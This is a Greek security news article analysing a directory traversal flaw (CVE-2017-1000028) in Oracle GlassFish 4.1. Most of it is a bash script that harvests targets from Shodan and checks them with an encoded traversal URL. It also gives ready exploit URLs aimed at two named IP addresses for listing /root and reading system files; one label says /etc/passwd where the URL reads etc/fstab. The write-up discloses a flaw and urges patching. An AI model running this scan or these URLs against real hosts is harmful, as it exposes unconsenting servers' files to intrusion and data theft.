ΑρχικήSecurityGlassFish Oracle: Ευπάθεια εκθέτει δεδομένα χιλιάδων Servers παγκοσμίως (Ανάλυση)

GlassFish Oracle: Ευπάθεια εκθέτει δεδομένα χιλιάδων Servers παγκοσμίως (Ανάλυση)

GlassFish Oracle Ευπάθεια: Ο ερευνητής Ασφάλειας Δημήτρης Ρούσσης μας αναλύει πως μια ευπάθεια πάνω στον γνωστό Application Server GlassFish της Oracle που έχει αναγνωριστεί ως CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) εκθέτει σήμερα δεδομένα σε χιλιάδες servers παγκοσμίως.

GlassFish Oracle

Η εκμετάλλευση του κενού ασφαλείας επιτρέπει την ανάγνωση μέσω επίθεσης τύπου Directory Traversal Attack όλων των αρχείων του server που είναι εγκατεστημένος ο Application Server.

Στην ανάλυση που πραγματοποιεί ο ερευνητής αρχικά χρησιμοποιούνται ως δείγμα 300 servers μέσω της μηχανής αναζήτησης shodan που έχουν εγκατεστημένο τον GlashFish στην έκδοση 4.1.

Στην συνέχεια μέσω ενός αυτοματοποιημένου script που δημιούργησε ο ερευνητής ελέγχονται σε ποιους από τους servers υφίσταται πραγματικά η ευπάθεια.

#!/bin/bash
# Get 300 Results From Shodan search engine
shodan search --limit 300 --fields ip_str GlassFish 4.1 port:4848 > servers_ip.txt
# Sort IP
cat servers_ip.txt | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 > servers_sort.txt
# Remove All Whitespace
sed -r 's/\s+//g' servers_sort.txt > servers.txt
# Delete Temporary Files
rm servers_ip.txt
rm servers_sort.txt
# Server List
input="servers.txt"
# check Server for the vulnerability
while IFS= read -r line
do
ip=$line
# http://server_ip/theme/META-INF/../../../../../../../../../../
url="http://$line:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af"
echo -n "ip: $line"
fetch=`curl -s -o /dev/null --max-time 5 -w "%{http_code}" $url`;
if [ $fetch = 200 ]
then
echo " - Connection Successful! Server is vulnerable"
#Save result in vulnerable_servers.txt
echo "$url" >> vulnerable_servers.txt
else
echo " - Connection Failed! Server is Not vulnerable"
fi
done < "$input"

Servers

Το τελικό αποτέλεσμα του script είναι η δημιουργία ενός αρχείου που περιλαμβάνει συνδέσμους (urls) προς άμεση εκμετάλλευση της ευπάθειας.

Εξετάζοντας τους συνδέσμους που συμπεριλαμβάνονται στο αρχείο browser μπορούμε να δούμε όλα τα αρχεία στο /root του Server.

Ενδεικτικά:

Windows Server

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle

Linux Server

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle Servers

Μπορούμε πλέον να προσπελάσουμε οποιοδήποτε αρχείο επιθυμούμε στον Server προσθέτοντας την διαδρομή του αρχείου στο τέλος του url.

Π.χ.

/etc/passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/root

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

 

Η παραπάνω μελέτη αποδεικνύει αφενός μεν πως μια ευπάθεια μπορεί να οδηγήσει στην αποκάλυψη δεδομένων σε ευρεία κλίμακα παγκοσμίως και αφετέρου την αναγκαιότητα άμεσης εφαρμογής των ενημερώσεων λογισμικού από τους Διαχειριστές των συστημάτων.

Η συντακτική ομάδα του SecNews ευχαριστεί θερμά τον ερευνητή Δημήτριο Ρούσση για την έγκυρη και έγκαιρη ενημέρωση.

 

 

 

 

* Ο Δημήτρης Ρούσσης είναι μέλος του Εργαστηρίου Ασφάλειας Πληροφοριακών Συστημάτων του Πανεπιστημίου Αιγαίου.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

spot_img

Εγγραφή στο Newsletter

* indicates required

FOLLOW US

LIVE NEWS